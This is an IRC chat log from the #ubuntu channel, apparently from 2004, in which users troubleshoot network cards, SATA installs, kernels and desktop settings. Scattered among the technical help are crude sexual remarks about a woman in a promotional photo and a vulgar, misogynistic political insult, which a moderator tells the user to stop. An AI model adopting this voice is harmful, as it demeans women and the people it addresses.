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xipAnyone have any recommendations on where to get good gnome themes?04:41
Safari_Alxip, art.gnome.org for greast justice.04:41
Burgundaviaxip: gnome-look.org04:41
tabmoWi have just installed ubuntu on my laptop and am having problems getting my network up, it is a pcmcia network card (xircom), any ideas?04:41
xipthank you both :)04:41
tabmoWi have dhcp running...04:41
BurgundaviatabmoW: do you have an ip address?04:41
BurgundaviatabmoW: open a terminal and type ifconfig04:42
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zu22i heard i can get free copy of ubuntu sent to me04:42
tabmoWit says but that is what i set to see if it would work... but it doesn't04:42
zu22how do i go about that?04:42
nickersmy wireless worked great on first boot...now on reboot my eth1 is gone04:42
nickersany ideas?04:42
Burgundaviazu22: shipit.ubunutu.com I think04:42
nomasteryodanickers, is it pcmcia?04:43
nickersipw2200 is loaded04:43
zu22burgundavia: thanks, ubuntu is a Live (bootable) CD distro like Morphix and Knoppix eh?04:43
Burgundaviazu22: There is both a livecd and an installable one04:43
Burgundaviazu22: If you ask for a ship from ship it, they send you both04:43
zu22burgundavia: what type of package management - RPM or APT?04:43
Ruffian|JANE|I got KDE working great in Ubuntu04:43
tabmoWBurgundavia: ifconfig eth0 gives me an ip address but it is the one i set to test, there is no network connection though04:44
Burgundaviazu22: apt04:44
nomasteryodaBurgundavia, really?04:44
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Burgundavianomasteryoda: about the shipping of cds?04:44
nomasteryodai got 20 ordered for my LUG04:44
Burgundaviayep, they send you a livecd free04:44
nomasteryodabut didn't know the live comes with them04:44
BurgundaviaMy LUG is also redhat lovers04:44
nomasteryodai love Ubuntu04:44
nickershey my ipw22200 failed to load firemware04:45
nomasteryodaand hald rocks04:45
BurgundaviaYes, a very nice distro04:45
nickersis there a apt-get package to reinstall the ipw2200 stuff04:45
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tylerwylieUbuntu is a nice change from those overbloated SuSE and Redhat, I think it's a good step to start on before moving to debian, slackware or gentoo,04:45
hypa7ianickers: you can grab the firmware off ipw2200.sf.net04:45
hypa7iatylerwylie: agreed!04:45
tabmoWanyone got any ideas to help get my pcmcia nic working in my new ubuntu install on my laptop ?04:45
tylerwylietabmoW, ndiswrappe?04:46
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tylerwylieIf only it helped you configure your own kernel04:46
tabmoWndiswrappe ?04:46
tylerwylieI'm sickened by lsmod so i got a new kernel already04:46
nomasteryodatabmoW: its a xircom ... what model04:46
tabmoWnomasteryoda: rbt-100 i think04:47
whiprushjdub: ping04:47
zu22Burgundavia: cool!04:47
nomasteryodawhat does a tail show04:47
nomasteryodawhen plug/unplug04:47
Burgundaviazu22: Ubuntu is basically Debian04:47
LinuxJonestylerwylie, you can add modules to be loaded @ boot time, but adding them to /etc/modlues04:47
Burgundaviazu22: plus modern packages04:47
tylerwylieLinuxJones, already got my new kernel in place04:48
LinuxJonestylerwylie, ahh04:48
zu22Burgundavia: neat~ im ordering now :)04:48
tylerwyliejust need to edit what i think i need to edit,04:48
nomasteryodatabmoW: ?04:48
tabmoWnomasteryoda: it says enabling device etc. etc.04:48
GotD0ti have a cf card reader that plugs into the printer port... does anybody know how i could get it working?04:48
tylerwylieubuntu has it's quirks, sudo, the grub setup, i04:48
tylerwylie'll get used to it04:48
tabmoWxircom_tulip_cb: already loaded04:48
tabmoWstuff like that04:48
nomasteryodatylerwylie: you can fix the sudo04:48
tylerwyliei dont' wanna fix it04:49
tylerwylieit's just wierd04:49
nomasteryodajust boot up and give root a password04:49
nomasteryodain recovery mode04:49
nomasteryodai did that until i saw sudo04:49
tabmoWnomasteryoda: any ideas... dhclient eth0 fails...04:49
nomasteryodatabmoW: thining04:49
tylerwyliei just need help with my grub.conf04:49
nomasteryodatabmoW: dmesg?04:50
LinuxJonesnight all sleepy time :)04:50
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tabmoWnomasteryoda: it says that xircom cardbus adapter found etc. etc.04:50
kriswhats shaking everyone?04:50
nomasteryodaman i wish i had my xircom card for my laptop04:51
nomasteryodai installed ubuntu on it today04:51
nomasteryodaworks with the 3com card04:51
kriswhats xircom?04:51
krissorry, im a linux newb04:51
nomasteryodatabmoW's card04:51
nomasteryodaxircom pcmcia nic04:51
krisive never heard of that brans04:52
nomasteryodakris, congrats on looking at linux04:52
kristhx man04:52
usualI'd like to see a howto on adding a grub splash and bootsplash04:52
nomasteryodatabmoW: ifup eth004:52
krisyeah i was playing with grub today04:53
krisi cant boot to windows now... argh04:53
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nomasteryodakris, one drive or 204:53
tabmoWnomasteryoda: it says error for wireless request "set encode"...04:53
tabmoWit's not even a wireless nic though....04:53
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nomasteryodatabmoW: seems certain it is detecting it wrong04:56
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skullbocksthere is no root account in ubuntu ?05:01
nomasteryodaskullbocks: no05:01
ryan its setup to just use sudo by default05:01
nomasteryodabut you can set it if you want05:01
ryanyou can enabled it with sudo passwd root05:01
ryanenable, too05:01
nomasteryodasudo passwd05:01
skullbocksbut is there any xay to have sudo password deferent from user password05:02
usualmake a new user05:02
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usualhoyl shit my fart stinks05:02
tylerwylieok so now i've got my own kernel, how do i fix the modules attempting to load05:02
hypa7iathanks for sharing usual :-p05:02
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usualtylerwylie, /etc/hotplug/blacklist05:03
nomasteryodaglad this is smellum-free IRC05:03
usualtylerwylie, you can stop modules from loading in that file05:03
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usualkernel upgrade in hoary05:04
hypa7iaIRC, now with SMELLOVISION05:04
usualgotta reboot05:04
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zu22haha this is funny05:06
zu22check out the pic on the ubuntu site: http://www.ubuntulinux.org/login.jpeg  there is some dude with no shirt on and some blond chick the camera is looking down her shirt at her big boobies05:06
zu22haha that is one way to advertize a linux distro :)05:06
chibifsGoodbye, america. :/05:07
hummunnahHi, I'm trying to install ubuntu but when It gets up to doing partition tables it doesnt seem to pick up any hard drives... any ideas anyone?? (My hard drive is a Western Digital SATA 120gb hdd)05:07
zu22maybe if we use ubuntu we can all get hot girlfriend like her? hehe05:07
hypa7iazu22: those are not big boobies :-p05:07
chibifsWho's the guy on my wallpaper? he's got a hawt body. :o05:08
hypa7iaagreed chibifs05:08
zu22hypa7ia: big enuf ;)05:08
chibifsAnd he's staring at that chick's boobs.05:08
chibifsI wonder what he's thinking.05:08
zu22chibifs: "damn if i install Ubuntu, that girl is MINE! " haha05:09
hypa7iahummunnah: i'm not sure how good sata support is :-/05:09
hypa7iabut i don't know these things too much yet :-)05:09
hypa7ianah, i bet he's thinking...05:09
hummunnaho i see...05:09
hypa7ia"can't wait til i can get my clothes back on and go upgrade my kernel!05:09
thoreauputichypa7ia: hahaha05:10
pepsi_they added the models and then took them back out05:10
=== hypa7ia added them back
hypa7iawell, the spash is still there05:11
hypa7iaand add ubuntu-calendar05:11
hypa7iaand you're golden05:11
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hypa7iawith synaptic that is05:11
pepsi_yeah, so thats why the monthly calendar was the same as the regular one05:11
zu22hypa7ia: i cant order the CDs i get some damn python error u wanna see error?05:11
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zu22the error is for http://shipit.ubuntu.com/user.cgi05:12
hypa7iazu22: don't knwo if i'd be able to help with such errors :-/05:13
zu22hypa7ia" ok u know who i can email about it?05:14
zu22the error is on their server05:14
hypa7iaerk, i don't know....05:15
hypa7iaoooh, the bugzilla05:15
hypa7iaeven tho it's not an error in the distro per se, it's prolly still the best place to put it05:15
zu22ah ok05:15
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pepsi_when am i going to get my CDs?05:18
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hypa7iapepsi_: check the topic :-)05:19
pepsi_hypa7ia, thx05:20
hypa7iano problemo :-)05:22
usualdoes anyone know about using ubuntu on a SATA disk? hummunnah is having some issues and could use some guidance05:24
usualI don't use SATA05:24
shaverworked great for me05:24
shavervia controller05:24
shaverbuilt into my motherboard05:24
hypa7iahttp://www.linux.com/article.pl?sid=04/10/12/1424244 <-- sata issues05:24
hummunnahyah my controller is onboard..05:24
hypa7iahttp://lists.slug.org.au/archives/slug/2004/10/msg00030.html <-- more sata05:25
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tylerwylieIt's Election Day ... so please do America a favor:05:30
tylerwylieeek wrong channel05:30
hypa7iaheheh good one tylerwylie05:31
tylerwylielibertarian extraordanaire05:31
hummunnahhows the election going over there??05:31
hummunnahso bush is winning?05:31
tylerwyliekerry might win05:31
hypa7iaCBC (canadian) is calling it 210/199 for the shrub05:31
tylerwyliethat's horrible05:31
ivartylerwylie, you're pro bush ?05:32
=== hypa7ia is canadian
hypa7iasuffice to say, i disagree, tylerwylie.05:32
hummunnahmmm me too05:32
tylerwylieno, i'm just anti-kerry05:32
hypa7iabut pro-bush?05:32
hummunnahwell to be honest im anti both of 'em.... im just MORE anti bush05:32
tylerwyliei dont like the idea of soggy 90 year old vaginas(no offense if there are any out here) taking the role of leader of a constitutional republic05:32
tylerwylieBadnarik > bush > pile of shit > kerry05:33
balubawell having bush winning will result in a faster decadence for US05:33
balubadon't really know what to hope from abroad05:33
hypa7iaum excuse me 90 y o vaginas?05:34
ivarubuntu question: I've accidently moved my taskbar to the side of the screen and can't figure out how to bring it back to the bottom..05:34
tylerwylieivar, click+drag05:34
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hypa7iahummunnah: agreed05:34
ivarooooh. middleclick05:34
ivartylerwylie, duh.. thanks05:34
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tylerwylieivar, no need for middle click05:35
ivarleft click doesn't work05:35
ivarwhich is what I tried..05:35
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ivartylerwylie, weird.. it does05:35
tritiumtylerwylie, resulting to name-calling doesn't help your cause05:35
tylerwyliedoesn't matter polls are closed05:36
zu22u need 270 electoral votes to win05:36
=== drbyte [~byte@byte.fedora] has joined #ubuntu
drbyteanyone using a dell inspiron 510m here?05:36
hummunnahu having issues installing ubuntu on a dell?05:37
hummunnahor using ubuntu on a dell?05:37
tylerwylieubuntu installed fine on this dell05:37
balubawell night all05:37
drbytei want to buy the dell 510m, and am wondering if ubuntu just works on it05:37
hummunnahgrr i hate dell Badnarik>kerry>pileofshit>bush>dell :P05:38
tylerwyliedrbyte, don't get dell, get hp, ibook, ibm, anything but dell05:38
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hummunnahtoo many compatability issues05:38
drbytetylerwylie: i have several laptops already. this would be my first dell :P05:38
austai'm about to install ubuntu on an HP notebook.. anything i should worry?05:38
tylerwyliedrbyte, don't get dell, just MS's little biotch05:38
hypa7iaausta: what graphics and network?05:39
drbytetylerwylie: heh. prices are reasonable tho05:39
tylerwyliedrbyte, yea, try to get them to sell you a laptop WITHOUT microsoft,05:39
hummunnahdrbyte: did you ever wonder why prices are reasonable?05:40
austaprosavage on-board graphics and a belkin 802.11g wireless card with WAP encrypted network05:40
drbytetylerwylie: lets put it this way.. i kinda want the windows XP too. its cheaper than trying to buy a license05:40
tylerwyliedrbyte, TRAITOR05:40
=== leaf_ [~leaf@68-234-160-228.vnnyca.adelphia.net] has joined #ubuntu
tylerwyliedrbyte, get the HP or IBM or powerbook(apple)05:40
drbytetylerwylie: have apple, have ibm (older t20), hp. hmm05:40
hypa7iadrbyte: get an asus.   you can get them barebones.  i did :-)05:41
hypa7iano ms tax!05:41
hummunnahhmm "buy a microsoft license"??.... im not familiar with this term05:41
drbytehypa7ia: nah.05:41
austahypa7ia, any idea?05:42
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mercurusgreetings all05:43
hypa7iaausta: idea on what?05:43
hypa7iaevenin mercurus05:44
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austaif i should have any problems with the install05:44
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tylerwylieRegardless of who wins the presidency, how can someone feel positive about the future of this republic when over 45% of the population is voting for a man like John Kerry, we are in a lot of trouble and that lot of trouble is us -- Neal Boortz05:45
tylerwyliewrong channel again05:45
tylerwyliesorry guys for political ramble05:45
HrdwrBoBtylerwylie: please do not discuss US polotics in this channel05:45
HrdwrBoBa) it's offtopic05:45
HrdwrBoBb) I don't feel like whuppin anybody today05:45
hypa7iaoh, austa, sorry, no attention span here :-)  what's the chipset on the wifi?05:46
hypa7iathank you HrdwrBoB :-)05:46
austahypa7ia, you mean like 802.11g ?05:46
hypa7ianope, as in who makes the chip05:47
hypa7iaintel etc05:47
hypa7iamore important than belkin05:48
hypa7iaprolly not05:48
hypa7iatry this:05:48
hypa7iaerr, nm, idea would have required havinf the laptop present05:48
austahypa7ia,  Broadcom 9430605:49
hypa7iaahh.  i think you're good then05:49
hypa7iamight want to google that and linux tho05:50
austaexcellent! i will do that05:50
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polokWhat would be a reason why Firefox doesn't print out Japanese?05:55
tylerwyliebecause you don't use the correct character set?05:56
polok(it displays it, but when I select print, a bunch of boxes come out of my printer)05:56
poloktylerwylie: sorry, I meant hardcopy print. >_< It displays it05:56
hypa7iathat's supah weird05:58
polokmy printer does print Japanese characters.05:59
polokOpenoffice does it perfectly well.05:59
polokjust when firefox does it05:59
billytwowillyhow do I get nautilus to open directories in the same window?06:01
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chibifsbilly- open gconf06:03
chibifsGo to the nautilus settings06:03
chibifsApps>Configuration Tools>Configuration Editor06:03
billytwowillyhmm. I'm there. window_always_new doesn't appear to be set, yet I keep getting new windows06:03
hypa7iabillytwowilly: http://www.thelinuxpimp.com/main/modules.php?op=modload&name=News&file=article&sid=57006:03
hypa7iathat should do it06:04
chibifsSet nautilus>prefrences>always_use_browser06:04
billytwowillythanks. I'l take a look06:04
HrdwrBoBchibifs: it's actually in the optucs06:04
chibifsLies. :o06:04
HrdwrBoByou don't need to use gconf06:04
chibifsWhen was this changed?06:05
HrdwrBoBages ago06:05
HrdwrBoBit's been in ubuntu for months06:05
billytwowillyI don't want them to be browser windows, I just don't want a new one every time.06:05
billytwowillythe way it looks now is good. I just want only one window open for browsing06:06
=== billytwowilly goes to check out the above mentioned link
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chibifsOh. I think spatial is silly. :P06:08
chibifsfile managers feel useless without a location bar.06:08
billytwowillywell, idealy, I'd have a location bar on top of the spatical thing, but have everything open in the same window06:08
billytwowillyhmm. I'd also need a back button I suppose;) damnit;)06:09
PizbitUse the backspace key06:09
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=== billytwowilly tries to figure out how to make the buttons much smaller
=== billytwowilly gives up
chibifsHeh, isn't there a way to disable graphic buttons completely?06:15
chibifscan in xffm. :/06:15
mercuruschibifs: aye, in Preference for Nautlius06:15
=== KoYoTe_K [~sebastian@75-70-246-201.adsl.terra.cl] has joined #ubuntu
chibifsWould that work for you, billy? :P06:16
billytwowillywould what work? I'm looking in prefs and don't see anything.. and xffm doesn't make any sense to me.06:17
billytwowillyI'm a kde user;) everything is easy in kde;)06:18
KoYoTe_KThe one who has repositories for ubuntu, I want to install mplayer and several things more...06:18
tylerwylieyou have totem installed don't you?06:18
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KoYoTe_KTotem does not work with videos06:19
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KoYoTe_Knot reproduce06:20
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leaf_you have to install w32codec package to play "videos"06:21
KoYoTe_KThis one installed but it does not work06:21
leaf_you may want to try the totem-xine package06:22
leaf_rather than the totem-gstreamer06:22
leaf_that is installed by default06:22
KoYoTe_KI sit it do not speak English much probably be wrong on having written06:23
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chibifshttp://babelfish.altavist.com :P06:24
=== nomasteryoda is away: IM me @ nomasteryoda on AIM / YIM
chibifsThat was some fun IM'ing.06:25
deweyKoYoTe_K: I installed mplayer from source in ubuntu and it works great :)06:26
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Se7hcan someone clarify one thing for me06:29
Se7hwhat does this actualy means ?06:30
Se7h Enter the interface which is used for using dynamic DNS service.06:30
Se7hsorry for OT06:30
HrdwrBoBSe7h: the interface which you want the ip of06:31
HrdwrBoBlikely ppp006:31
Se7hah ok06:31
Se7hthough so but didn't want to screw it up06:31
Se7heth0 for me i guess06:31
billytwowillyis there an easy way to setup mounting of nfs file systems? a tool that will do it for me?06:34
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Se7hi dont know any06:35
Se7hnow a question related to ubuntu06:35
Se7hi've got Linux kernel image for version on 386.06:35
mbp__billytwowilly: vi? :-)06:35
stuNNedwill hoary have DSDT support compiled into it's native kernel?06:35
Se7hif i replace it for Linux kernel image for version on AMD K7.06:36
Se7hwhat do i have to do besides a reboot06:36
dasenjoHi, how are you ? I still cant download ubuntu with jigdo .. error: "Aaargh - 69 files could not be downloaded."06:36
ficusplanetSe7h, Just pick it from the boot menu.06:36
Se7hbut wont it need to be compiled or somethin' ?06:37
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mercurusSe7h: a kernel image is pre-compiled into a binary and modules ... to save the hassle of compiling it locally06:38
dasenjosome mirror administrator ? I almost sure that is not my problem ..06:38
Se7hthanks mercurus06:38
Se7hjust to make sure06:38
Se7him always afraid of screwing this up ;P06:38
Se7hbut will grub be auto-updated ?06:39
hypa7iaugh, i have to patch my kernel06:39
hypa7iastoopid acpi06:39
=== hypa7ia killinates the laptopside
Se7hficusplanet was that for me ?06:40
mercurusSe7h: probably, it depends on the kernel package maintainer ...06:40
ficusplanetSe7h, yes.06:40
=== holycow [~yada@S0106002078ccd651.vf.shawcable.net] has joined #ubuntu
ficusplanetSe7h, dpkg, when installing the package will run grub-update automatically.06:40
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Se7hhm ok then06:41
dasenjocan someone answer me ? I want to try ubuntu release ... but the jigdo file is bad .. and I cant ..06:41
Se7hcause i got a bunch of kernel stuff i think it would be good to replace to my cpu type06:41
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hypa7iawhat's jigdo?06:42
mercurusdasenjo: try a different mirror ?06:42
Se7hi ask the same06:42
dasenjohypa7ia, a program for downloading ..06:42
hypa7ialike wget?06:42
ficusplanetSe7h, You'll get slight performance boosts, yes.06:43
dasenjomercurus, i tried three mirrors with the same problem ..06:43
dasenjohypa7ia, its more specific ..06:43
Se7hk then06:43
hypa7iaperhaps you should thus conclude that the problem is not with the mirrors :-)06:43
Se7hi guess i'll just do that06:43
dasenjohypa7ia, to download CD/DVD images ..06:43
dasenjohypa7ia, or .. that all the mirrors have a bad .jigdo file ..06:44
Se7hi suppose when i select the k7 package to install, i've got to remove the 38606:44
shaveryou can have both installed, I believe06:45
ficusplanetSe7h, Nope.06:45
dasenjoI download so much files .. but there are errors with 69 ..06:45
ficusplanetSe7h, You can have any number of kernel images installed06:45
=== regeya taunts PySol
Se7hoh i see06:45
ficusplanetSe7h, They are just added as entries on the boot menu.06:45
regeyadang, it's throwing exceptions like crazy06:45
Se7hmakes sense06:46
Se7hbut the fact of having to many06:46
Se7hwont affect the performance ?06:46
=== gh0zt_cl [~gh0zt@pingu.netlinux.cl] has joined #ubuntu
ficusplanetSe7h, There's no risk installed the k7 package.  If it doesn't work, just select the i386 package again.  No, have a lot of them doesn't affect performance.  They're just files on the hard drive.06:46
stuNNedhi ubuntu chann!06:46
gh0zt_cldid some one speak spanish?06:46
hypa7iahablo un pocito06:47
=== mrpister [~mrpister@207-237-76-83.c3-0.nyr-ubr4.nyr.ny.cable.rcn.com] has joined #ubuntu
hypa7iano hay un channel ubuntu-es?06:47
dasenjoyo hablo espaol .. pero no he probado ubuntu ..06:47
Se7hhmmmkay ficusplanet thanks for the info06:47
gh0zt_cli dunno06:47
ficusplanetSe7h, np06:47
Se7hdasenjo hello visinho06:47
gh0zt_cltengo unas dudas con el soprte de hardware06:48
stuNNedsay...i have package i need to compile against source of running kernel, how so in ubuntu!?!06:48
Se7hgh0zt_cl shoot06:48
dasenjogh0zt_cl, entra a #ubuntu-es .. aunque hay muy pocas personas ..06:49
Se7hcome again stuNNed ?06:50
=== ubll [ubll@cpe-065-184-044-045.nc.rr.com] has joined #ubuntu
stuNNedSe7h, need to compile something that looks for version.h in /usr/src/linux but how to install kernel-sources in debian i have no clue :)06:50
Se7hnot that i can help much06:51
Se7him a noob on this06:51
Se7hbut i suppose u want apt-get06:52
stuNNedSe7h, think it's mkdpkg or something :)06:52
Se7hmake debian pakage ?06:52
stuNNedi think so, Se7h06:53
Se7h"but how to install kernel-sources"06:53
Se7hu got to get them first06:53
Se7hi guess06:53
stuNNedSe7h, think it's `apt-get install kernel-source` or something then mkdpkg or something http://www.desktop-linux.net/debkernel.htm :)06:54
=== tylerwylie just threw his own compiled kernel from gentoo installation so he didn't have to use bloated ubuntu kernel
ficusplanetstuNNed, Install linux-source and linux-headers06:55
Se7hapt-get is for sure06:55
shavertylerwylie: interesting; how much memory did that sake you?06:55
tylerwylieshaver, a LOT06:55
stuNNedficusplanet, okie, i'll try!06:55
shaverlike, 4M?06:55
tylerwylieshaver, it speeds up your distro too06:55
ficusplanetWell, it's looking like four more years of Bush.06:55
shaverwhat speedups do you see/06:55
tylerwylieshaver, boot time by 20 seconds06:55
shavercompile-time reductions? improved TPC?06:56
tylerwylieshaver, everything has more memory available06:56
shaverhow much more memory, though?06:56
stuNNedficusplanet, which kernel-headers though? :\06:56
shaverwhat's the difference in kernel-memory used between the kernels?06:56
tylerwyliedidn't see how much ubuntu took06:56
tylerwylieit didnt' last long enough06:56
=== AlohaWolf [alohawolf@cpe-24-24-251-219.socal.rr.com] has joined #ubuntu
ficusplanetstuNNed, whichever ones match your running kernel06:56
ficusplanetstuNNed, run uname -r to figure that out, if you need to06:56
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stuNNedficusplanet, there are none available for running kernel...06:57
Se7hdownloaded and compiled06:57
tylerwylieshaver, no matter what i'm always gonna be using my own kernel, not what some distro thinks i should use06:57
Se7hi'll check it out on my next boot06:57
ficusplanetstuNNed, what is the output of uname -r06:58
dasenjoI dont wanna disturb .. but the iso CANT be downloaded with jigdo, I'm sure. Im going to download the iso directly ... thanks.06:58
ficusplanetThen you want to install linux-headers- and linux-source-
stuNNedficusplanet, don't see them available, one sec07:00
stuNNedficusplanet, yep, bash_completion says they are not avial07:00
ficusplanetJust look around in synaptic.  They are both part of the base, supported ubuntu repository.07:01
=== FLeiXiuS [~fleixius@pcp0010487831pcs.essex01.md.comcast.net] has joined #ubuntu
stuNNedficusplanet, k thanks07:03
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=== ttikk [ttikk@c-67-180-143-247.client.comcast.net] has joined #ubuntu
ttikkhow do i get my airport card working on my powerbook laptop ?07:06
ficusplanetttikk, Airport Extreme?  Or the older version?07:07
ttikklatest powerbook07:07
corbobi have tried to mount a partition in my home directory as ~/music, but i can't write to it...07:07
ubllWhat are some reasons to use Ubuntu instead of MEPIS? Other than KDE/GNOME preference?07:07
ficusplanetttikk, There are no drivers for the latest airport cards because they are based upon the closed broadcom chipset.07:07
ttikkthat is lame as hell07:08
ttikkwhy don't they open them up ?07:08
ficusplanetubll, Time-base, six-month release cycle.  Big, full-time stall.07:08
corbobas soon as i mount it, the user changes to be root...07:08
ficusplanetttikk, They claim that they can't because the card CAN transmit on military frequencies.07:08
corboboh nm i got it:)07:08
ficusplanetcorbob, How is the partition entered in /etc/fstab07:08
ficusplanetcorbob, cool07:09
ttikkany efforts to reverse engineer a driver ?07:09
corbob/dev/hda3       /home/corbob/music      ext3    rw,user        0       207:09
ubllficusplanet: interesting thanks.07:09
ficusplanetttikk, Not that I know of.  Sorry.07:09
corbobi just sudo chown corbob:corbob music once i have mounted it07:09
corboband now it seems i can mount and unmount it at will;)07:09
dasenjowhere can I report the jigdo file problem ??07:10
ttikkwhat about my usb wireless card ?07:10
ttikkit is a no-name07:10
hypa7iadasenjo: bugzilla?07:10
ficusplanetttikk, I would need to know the chipset it is based upon.07:10
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ficusplanetttikk, Do you have the model number of the device?07:11
=== billytwowilly [~chris@S0106000c413a2c0c.ed.shawcable.net] has joined #ubuntu
dasenjohypa7ia, thanks ..07:12
hypa7iano problem dasenjo, sorry i couldn't be any more helpful with the issue :-/07:12
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erminahi all07:13
hypa7iaallo ermina :-)07:14
erminaI've downloaded and install some packages. If I want to reinstall ubuntu, can I use downloaded files ?07:14
erminaI don't want to re download them07:14
hypa7iai think to07:14
hypa7iause dpkg --install package_name07:15
hypa7iashould work07:15
ficusplanetermina, Burn the contents of /var/cache/apt/archives to a cd.07:15
=== tsblack [~thomas@franklin.tsf.org.za] has joined #ubuntu
hypa7iaoh, yeah that too :-)07:15
erminasome of the packages need other packages, is it already handled ?07:15
tsblacklo all07:15
ficusplanetermina, Everything you've installed with apt-get or synaptic is in that folder.07:16
tsblackany tips on installing ubuntu on a combined ata / sata system.07:16
hypa7iatsblack: which drive is / going on?07:16
tsblackInstaller only gets as far as picking up the CD on the ata chain, but cant find the hd drives on sata07:17
=== TongMaster [~TongMaste@157.besecure.net.au] has joined #ubuntu
erminafor example if I want to install an application, it would need any lib*07:17
tsblackThe bios doesn07:17
tsblackdoesn't support legacy mode for sata drives either, so not much option there...07:17
hypa7iatsblack: http://www.linux.com/article.pl?sid=04/10/12/1424244 <-- sata issues07:17
hypa7iatsblack: http://lists.slug.org.au/archives/slug/2004/10/msg00030.html <-- more sata07:17
ficusplanetermina, If you've installed stuff with apt-get or synaptic, those tools would have download those dependencies to that directory as well.  So, upon reinstalling, just mount the cd, and in the directory run dpkg -i *.deb07:18
corbobis there a reason songs ripped with sound juicer are really bad...07:18
ficusplanetcorbob, What do you mean by really bad?07:18
hypa7iadumb question: does dpkg deal with dependencies like apt does?07:18
ficusplanethypa7ia, Yes.07:19
corboblike distorted...07:19
erminaficusplanet: even if I do fresh install, it would do the works?07:19
corbobat least the ogg files i've ripped with it...07:19
corbobor it might be rythm box...07:19
ficusplanetermina, Yes.  All the archives that you've installed/needed from apt-get are in that folder and will be installed with the command I told you about.07:19
ficusplanetcorbob, I've had similar troubles.  First, try playing the files with totem-xine.07:20
ficusplanetIf that doesn't work, it must be sound-juicer.07:20
tsblackhypa7ia: yanking out the IDE drives isn't an option, the installer is running off an ide cdrom...07:20
bob2if you got rid of the "e", we could all vote for you07:20
corbobficusplanet, i was just about to try that07:21
corbobno vote for me07:21
Se7hwhat do i do with this :07:21
Se7hPlease enter user information for root access to the mysql database.07:21
Se7hThe username is probably 'root', the password you should have set07:21
bob2read the README.Debian07:21
hypa7iatsblack: i don't recall suggesting that....07:21
Se7hsince root isnt activated07:21
bob2 /usr/share/doc/mysql-server/README.Debian07:21
bob2the mysql root user is completely unrelated to the ubuntu root user07:22
erminathanks all07:22
tsblackhypa7ia: that's how they solved the problem in the first article...07:23
hypa7iaoh yeah :-)07:23
hypa7iato elaborate:  i wasn't suggesting either as solutions, just that it's a known issue.  it's already been asked in this chan once this evening07:24
hypa7iai don't relaly know any mroe about it than that tho07:24
hypa7ianot having an sata drive handy and all07:24
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tsblackhypa7ia: Understood. I'm in SA with Mark for his Ubuntu launch over here and having a handful of hardware issues..07:25
tsblackTrying to resolve as quickly as possibl.07:26
hypa7iasorry i couldn't help more... i'm a total n00b :-)07:26
=== Ninjas-Rezatm [~ninja@cpe-24-143-142-199.cable.alamedanet.net] has joined #ubuntu
Ninjas-Rezatmdoes anyone download music in ubuntu??07:26
ficusplanetNinjas-Rezatm, I do.07:26
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Ninjas-Rezatmficusplanet: what program do you use?07:28
tsblackjoin #warty07:28
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ficusplanetNinjas-Rezatm, for FastTrack (Kazaa), Gnutella, and OpenFT I use giFToxic.  For soulseek I use nicotine.  For bittorrent, I use gnome-btdownload.  For edonkey, I use xmule.07:29
BigNastyKid909what's the command for extracting .tar.gz??07:29
Burgundaviawith some switches that I cannot remember now07:29
BigNastyKid909what options...07:30
Ninjas-Rezatmficusplanet: thanks for all the info... im kinda limited to what can be installed via apt. since im so noob!07:30
ficusplanetNinjas-Rezatm, Well, I'd just suggest starting with nicotine, then.  It's in the universe repository.07:30
=== corbob [~corbob@d207-81-63-141.bchsia.telus.net] has joined #ubuntu
dasenjoif anyone knows the website admin ... the bug exists and was opened on: 2004-10-2707:31
|trey|Anyone know why the Gaim text format bar in conversation windows is dulled out?07:31
=== paulproteus [~paulprote@h-67-102-97-191.mclnva23.covad.net] has joined #ubuntu
Ninjas-Rezatmficusplanet: thanks, just learning how to do this all07:32
ficusplanet|trey|, What protocol are you using?07:32
dasenjothe mail is lu [at]  canonical.com ...07:32
mrpisterExtracting tar.gz: tar -xzvf07:32
ficusplanetNinjas-Rezatm, No problem.  Let me know if I can help with anything.07:32
|trey|ficusplanet, doesn't appear to be protocol specific...07:32
|trey|ficusplanet, its dulled for all of the big 3, yahoo, MSN, and AIM07:32
=== RuffianSoldier [RuffianSol@dhcp024-209-106-036.woh.rr.com] has joined #ubuntu
ficusplanet|trey|, Strange.  I'm not sure what would cause that.  Sorry.  Maybe email the gaim mailing list.07:34
corbobi fixed it:)07:34
ficusplanetcorbob, What was the problem?07:34
corbobit was neither rythm box or sound juicer07:34
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corbobi had PCM and PCM 2 set to max07:34
|trey|ficusplanet, its the ubuntu version only... and Ubuntu is still at 1.0.0, so it would be disregarded if I asked Gaim folks...07:34
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corbobi had to pull them down a little bit, and now there's no distortion:)07:35
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ficusplanetcorbob, Ha. Well, I'm glad you've got it fixed.07:35
corbobit was the distortion you get when you crank the sound on crappy speakers07:35
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corbobexcept these are good headphones07:35
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Se7hLinux devil #1 Tue Oct 12 14:12:34 BST 2004 i686 GNU/Linux07:36
=== Tomcat_ [Tomcat@pD95E6C21.dip.t-dialin.net] has joined #ubuntu
paulproteusI installed Warty on two machines with 64MB of RAM.  GNOME is mostly unusable, and openoffice.org takes a full minute to load.  Are there any recommendations on either how to slim down an Ubuntu install, or on a minimum RAM size I can recommend?07:37
BigNastyKid909does anyone know the command for deleting a directory?07:37
stuNNedpaulproteus, there is install doc at ubuntulinux.org for older machines07:37
ficusplanetrm -Rf dirname07:37
BigNastyKid909cool thanks07:37
|trey|paulproteus, use abiword/gnumeric/etc, and I would recommend no less then 128 for any modern desktop...07:38
hypa7iapaulproteus: and use xfce or fluxbox07:38
hypa7iainstead of full gnome07:38
paulproteusWill e.g. hotplug work then?07:39
|trey|hypa7ia, shudder @ fluxbox.07:39
hypa7ia|trey|: don;t like it?07:39
paulproteusstuNNed: I'm having some problems finding that.  Is it in the FAQ or the Wiki or where?07:39
|trey|paulproteus, yes... those are not GNOME specific...07:40
bob2paulproteus: yes07:40
paulproteusOkay, I'll keep all this in mind.  Thanks. :)07:40
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|trey|hypa7ia, not at all... means you have to load X then when you first load an app, you must wait forever to load gtk libs etc the first time you run anything, annoying.07:41
BigNastyKid909ficusplanet: what's the command for deleting multiple files???07:41
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|trey|hypa7ia, would be fine I guess if you loaded gnome-session and kinit during start, but I never think of that while I am using flux  :/07:41
paulproteusBigNastyKid909: Like rm file1 file2 file3 ?07:41
bob2paulproteus: but things won't automount etc07:41
ficusplanetBigNastyKid909, rm file1 file207:41
BigNastyKid909oh ok07:42
stuNNedpaulproteus, i can't find it either :|07:42
paulproteusbob2: That's what I meant by hotplug, you're right. ;)07:42
|trey|bob2, actually they will.. he just won't get an icon on the desktop  ;)07:42
paulproteusThanks for the clarification.07:42
bob2|trey|: no07:42
bob2gnome-volume-manager does the mounting07:42
bob2well, I'm almost certain07:42
|trey|bob2, umm, I spent a day trying to stop that action with XFce4  :/07:42
